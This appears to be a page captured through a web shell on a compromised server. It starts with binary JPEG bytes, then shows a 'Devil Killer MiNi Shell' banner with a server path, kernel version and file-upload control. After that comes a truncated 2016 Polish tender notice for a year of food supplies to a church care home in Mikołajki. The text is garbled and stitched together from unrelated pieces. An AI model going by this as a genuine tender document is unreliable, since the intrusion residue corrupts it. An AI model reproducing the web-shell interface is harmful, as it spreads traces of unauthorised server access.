JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160122/14970-N-2016.html

<p class="kh_header"><b>Mikołajki: Dostawa artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko - Augsburskiej Św. Trójcy w Mikołajkach</b><br>
<b>Numer ogłoszenia: 14970 - 2016; data zamieszczenia: 22.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej im. Św. Trójcy , Plac Kościelny 5A, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 87 4216-811, faks 87 4215-049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arka.itmikolajki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ewangelicki Dom Opieki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko - Augsburskiej Św. Trójcy w Mikołajkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko - Augsburskiej Św. Trójcy w Mikołajkach w okresie od 01 marca 2016 do 28 lutego 2017 roku zgodnie z wykazem zamieszczonym w grupach I-VII.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 03.11.00.00-5, 15.50.00.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.11.20.00-6, 15.22.00.00-6, 15.98.00.00-1, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arka.itmikolajki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko - Augsburskiej Św.Trójcy w Mikołajkach, Plac Kościelny 5a, 11-730 Mikołajki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2016 godzina 08:30, miejsce: Ewangelicki Dom Opieki ARKA Parafii Ewangelicko - Augsburskiej Św.Trójcy w Mikołajkach, Plac Kościelny 5a, 11-730 Mikołajki - księgowość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 500g	szt 250,
Bułka drożdżowa  70g	szt200,
Bułka drożdżowa z jabłkiem 100g	Szt		600,
Bułka z serem 80g	Szt.		400,
Bułka jagodzianka 90g	Szt		300,
Bułka poznańska 90g	Szt.		16000,
Bułka maślana 80g	Szt		600,
Chleb razowy krojony 450g	szt		2000,
Chleb orkiszowy 500g krojony	szt		380,
Chleb zwykły krojony 1kg	Szt		6300,
Chleb ziołowy 350g	Szt		100,
Drożdże 500g	szt		10,
Eklerki 100g	Szt		200,
Pączek z marmoladą	Szt		600,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas 	szt		10,
Arbuz (sezon)	kg		170,
Banan	kg		1200,
Botwina pęczek	szt		90,
Brzoskwinie	kg		30,
Buraki czerwone	kg		730,
Cebula biała	kg		650,
Cebula czerwona	kg		7,
Cukinia	Szt		10,
Czosnek główka	szt		240,
Cytryna	Kg		300,
Czereśnie (sezon)	Kg		40,
Fasola szparagowa	kg		40,
Gruszki (sezon)	Kg		250,
Grejpfrut czerwony	Kg		330,
Jabłka	Kg		1320,
Kapusta młoda	Szt		180,
Kapusta biała	Kg		470,
Kapusta czerwona	Kg		110,
Kapusta kwaszona	Kg		580,
Kapusta pekińska	Kg		240,
Kalafior	Szt		35,
Kiwi	szt		400,
Koper pęczek 50g	Szt		540,
Mak niebieski	Kg		3,
Marchew 	kg		1150,
Mandarynka 	Kg		350,
Nektarynka	Kg		180,
Ogórek świeży	Kg		660,
Ogórki gruntowe	Kg		30,
Ogórki kwaszone	Kg		230,
Por	kg		500,
Papryka	kg		170,
Pomidory 	Kg		950,
Pomarańcza	Kg		210,
Pietruszka korzeń	Kg		10,
Pietruszka nać 50g	Szt		370,
Pieczarki	Kg		190,
Rodzynki 	Kg		2,
Rzodkiewka 250g	Szt		250,
Rzodkiew biała	Kg		50,
Szczypiorek pęczek 50g	Szt		310,
Seler	Kg		435,
Sałata masłowa	szt		100,
Sałata lodowa	szt		380,
Śliwki(sezon)	kg		30,
Truskawka (sezon)	Kg		65,
Winogrona ciemne	Kg		35,
Winogrona jasne	kg		35,
Wiśnie (sezon)	Kg		15,
Ziemniak młody	Kg		6000,
Ziemniak Irga	Kg		5200,
Zestaw do  kiszenia	Szt		10,
Grzyby suszone borowiki 20g	Szt		30,
Grzyby suszone podgrzybki 20g	szt		35,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny 150g	Szt.		1100,
Jogurt naturalny 350g	Szt		120,
Jogurt owocowy 150g	Szt.		2300,
Jogurt owocowy 350g	Szt.		300,
Masło extra 200g	Szt.		850,
Mleko skondensowane słodzone puszka 400ml	Szt.		10,
Mleko karton 2% 1l	Szt		570,
Maślanka naturalna 1l	Szt.		300,
Maślanka owocowa 1l	Szt.		40,
Margaryna extra z masłem 500g Delma lub równoważna	szt		1650,
Margaryna 450g o zawart.tł.min 39% typu Rama lub równoważna 	szt		750,
Margaryna do pieczenia Kasia 250g lub równoważna	szt		20,
Ser Feta 270g	Szt.		80,
Serek waniliowy Danio 150 g lub równoważny  	Szt.		3500,
Ser żółty edamski/gouda	Kg		400,
Ser pleśniowy 125g President Camembert lub równoważny	Szt		170,
Ser wędzony	Kg		30,
Serek  typu wiejski 200g	Szt		1100,
Serek 135g Twój Smak lub równoważny	Szt		1200,
Śmietana 30% 500ml 	Szt		70,
Śmietana 18% 400g	Szt		1250,
Twaróg chudy 250g	Szt		470,
Twaróg półtłusty 250g	Szt		3,
Twaróg sernikowy 1kg	Szt		20,
Ser mozzarella 125g	szt		170,
Serek Hochland zegarek lub równoważny 200g	Szt		600,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze klasa A waga M	szt		16500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek bk surowy	kg		200,
Boczek wędzony 	kg		150,
Ćwiartki kurczęce tylne schłodzone	kg		590,
Filet kurczęcy schłodzony bs	kg		550,
Flaki wołowe krojone mrożone 0,90	op		100,
Golonka surowa tylna wp	kg		100,
Gulasz angielski	kg		70,
Indyk faszerowany	kg		70,
Karkówka wp bk	kg		250,,
Kaszanka gryczano-jęczmienna	kg		180,
Kiełbasa biała parzona wp średnio rozdrobniona	kg		40,
Kiełbasa pieprzowa	kg		200,
Kiełbasa jasiuk - kiełbasa wieprzowa grubo rozdrobniona, wędzona, w której100g produktu wytworzono ze 125g mięsa wieprzowego	

kg		80,
Kiełbasa krakowska parzona - kiełbasa średnio rozdrobniona, parzona wędzona	kg		120,
Kiełbasa krakowska sucha  , kiełbasa wieprzowa grubo rozdrobniona, wędzona, parzona, suszona, w której na 100g wyrobu gotowego zużyto min.143g mięsa wieprzowego 	kg		100,
Kiełbasa madera - kiełbasa wp średnio rozdrobniona wysokowydajna, w której skład wchodzi min. 76%  mięsa wieprzowego	kg		600,
Kiełbasa parówkowa	kg		20,
Kiełbasa piwna	kg		45,
Kiełbasa swojska z cielęciną-kiełbasa wp z dodatkiem cielęciny średnio rozdrobniona, wędzona parzona, w której skład na 100g produktu wchodzi min. 114,2g mięsa wieprzowego i 2,3g cielęciny	kg		140,
Kiełbasa szynkowa - wędzonka grubo rozdrobniona, parzona z mięsa wieprzowego, w której do wyprodukowania 100g produktu użyto 106g mięsa wieprzowego	

kg		260,
Kiełbasa czosnkowa - kiełbasa wieprzowa, średnio rozdrobniona, wysokowydajna, wędzona, parzona 
mięso wieprzowe min.74%	kg		40,
Kiełbasa żywiecka sucha	kg		115,
Kości wp schabowe	kg		65,
Kura w galarecie	kg		90,
Kurczak świeży	kg		310,
Lunchmeat 	kg		130,
Łopatka surowa wp bk	kg		460,
Metka  cebulowa	kg		40,
Metka tatarska 180g	szt		40,
Metka łososiowa	kg		70,
Mielonka śniadaniowa	kg		70,
Mielonka tyrolska	kg		35,
Mortadela luksusowa	kg		30,
Nogi wp	kg		15,
Ozory wp	kg		30,
Parówki Berlinetki	kg		330,
Parówki maślane	Kg		20,
Pasztet pieczony wp blaszka	kg		80,
Pasztetowa drobiowa	kg		160,
Pieczeń czosnkowa	kg		15,
Pieczeń litewska	kg		110,
Pieczeń rzymska	kg		80,
Porcje rosołowe z kurczaka	kg		1000,
Polędwica sopocka wp, wędzona, parzona, w której skład wchodzi min. 58% mięsa wieprzowego	kg		160,
Polędwica drobiowa	kg		160,
Polędwica wiśniowa wp, wędzona, parzona, w której skład wchodzi min. 65% mięsa wieprzowego	kg		75,
Polędwica miodowa	kg		20,
Polędwica z warzywami	kg		105,
Rolada drobiowa z kurczaka	kg		10,
Salami bumerang	kg		50,
Salceson włoski	kg		110,
Schab pieczony- wędzonka wysokowydajna wieprzowa, wędzona, parzona wyprodukowana z 64% mięsa wieprzowego	kg		150,
Schab surowy wp bk	kg		210,
Serca drobiowe surowe	kg		20,
Skrzydła kurczęce schłodzone	kg		370,
Słonina wp surowa	kg		13,
Szynka wp surowa bk	kg		370,
Szynka wp gotowana	kg		30,
Szynka wędzona - szynka wp wędzona, parzona, w której skład wchodzi min.70% mięsa wieprzowego	kg		55,
Szynka konserwowa wp	kg		170,
Szynka wędzona z liściem w której skład wchodzi min.85%szynki wieprzowej, wędzona,parzona	kg		210,
Szynka bohuna wp wysokowydajna, wędzona,parzona, w której skład wchodzi min.72% mięsa wieprzowego	kg		40,
Udziec wołowy-zrazowa górna	kg		50,
Udziec indyczy	Kg		70,
Wątroba świeża drobiowa 	kg		100,
Wołowina b/k	kg		30,
Żeberka wp paski	kg		410,
Żołądki drobiowe świeże	kg		80,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Morszczuk filet	Kg		350,
Mintaj filet	kg		50,
Karp świeży 	kg		75,
Płat śledziowy solony bez skory 	kg		70,
Płat śledziowy marynowany	kg		106,
Makrela wędzona	kg		100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry 565g w syropie	Szt		70,
Aromat do ciast 5g	Szt		10,
Bazylia suszona 300g	Szt		2,
Barszcz ukraiński mrożony	kg		150,
Brokuł różyczki mrożony 	kg		30,
Brzoskwinia połówki w syropie 820g puszka	szt		270,
Budyń 1 kg mix	szt		20,
Budyń 41g mix	szt		50,
Chrzan tarty na kwasku cytrynowym 170g	szt		45,
Chrzan tarty 290g	szt		12,
Ciastka krakersy 100g	szt		250,
Ciastka biszkopty 500g	szt		200,
Ciastka biszkopty z galaretką 135g	szt		400,
Ciastka kruche bez czekolady z marmoladą 2,5kg	szt		3,
Ciastka pierniki w czekoladzie 2,5kg	szt		5,
Ciastka herbatniki 100g Pettit beurre lub równoważne	Szt		500,
Ciastka różne 1,5kg w kartonie	Szt		2,
Cukier biały kryształ	kg		1400,
Cukier puder 400g	szt		7,
Cukier waniliowy 32g	szt		250,
Cynamon mielony 20g	Szt		35,
Czekolada mleczna 100g świąteczna	szt		100,
Czekolada mleczna 90g	szt		500,
Czekolada mleczna 225g	szt		40,
Czekolada gorzka 90g	szt		100,
Czekolada biała 90g	szt		20,
Czosnek granulowany 500g	szt		5,
Ćwikła z chrzanem 260g	Szt		24,
Dżem niskosłodzony 260g mix	szt		1000,
Dżem fruktoza - dla cukrzyków 220g	szt		200,
Fasola sucha biała 5kg	op		20,
Fasola drobna 5kg	Szt		5,
Fasola konserwowa czerwona 400g	szt		25,
Fasola szparagowa zielona - konserwowa 470g	szt		70,
Fasola żółta  mrożona luz	kg		60,
Galaretka owocowa mix 75g	szt		100,
Groch suchy łuskany połówki 5kg	szt		20,
Groszek konserwowy 400g	szt		100,
Groszek mrożony 	kg		20,
Herbata ex a 300 Saga lub równoważna	szt		2190,
Herbata ex miętowa a20	szt		10,
Herbata owocowa ex a30 Saga lub równoważna	szt		70,
Kakao Decomorreno 200g lub równoważne	szt		15,
Kakao rozpuszczalne Gumiś 300g lub równoważne	szt		140,
Kalafior mrożony 	kg		70,
Kasza jęczmienna wiejska 1kg	Kg		85,
Kasza manna 1kg	szt		220,
Kaszka ryżowa bezmleczna 180g	szt		20,
Kaszka ryżowa bezmleczna owocowa mix 180g	szt		180,
Kawa naturalna mielona 250g	szt		30,
Kawa zbożowa 1kg	Szt		15,
Ketchup pikantny Kotlin 1kg lub równoważny	szt		35,
Kisiel 1kg	szt		5,
Kisiel 40g	szt		140,
Kompot mix 900ml	szt		370,
Koncentrat pomidorowy Pudliszki 800g lub równoważny	szt		140,
Koncentrat barszczu czerwonego 330ml	szt		30,
Kukurydza konserwowa 400g	szt		170,
Kminek 20g	Szt		25,
Kwasek cytrynowy 1kg	szt		10,
Liść laurowy 1kg	szt		3,
Majonez 815 g(skład:olej roślinny rzepakowy 63%,woda, musztarda,żółtka jaj 6%,cukier)Kętrzyński lub równoważny	szt		90,
Majeranek 100g	Szt		20,
Makaron kolanka 3kg	szt		5,
Makaron kolanka 1kg	szt		20,
Makaron nitka 1kg	szt		60,
Makaron nitka 3kg	szt		75,
Makaron rurki 3kg	szt		20,
Makaron świderki 3kg	szt		50,
Makaron świderki 1 kg	Szt		15,
Mąka ziemniaczana	kg		50,
Mąka tortowa typ 450	kg		200,
Mąka luksusowa typ 550	kg		600,
Mieszanka warzywna mrożona 7-składnikowa 	kg		400,
Mieszanka warzywna mrożona 9-składnikowa	kg		60,
Miód naturalny	l		33,
Miód wielokwiatowy 370g	szt		75,
Marchewka z groszkiem konserwowa 460g	szt		600,
Mieszanka kompotowa 5-składnikowa	kg		20,
Musztarda sarepska 210g	szt		150,
Ocet spirytusowy 10% 500ml	szt		80,
Ogórki konserwowe słoik 870g	szt		320,
Oregano 200g	Szt		2,
Olej rzepakowy 1l	szt		100,
Olej uniwersalny 1l	szt		380,
Pomidory suszone 314ml	Szt		15,
Papryka słodka mielona 500g Knorr lub równoważna	szt		4,
Papryka słodka mielona 1kg	szt		2,
Paprykarz szczeciński 330g	szt		120,
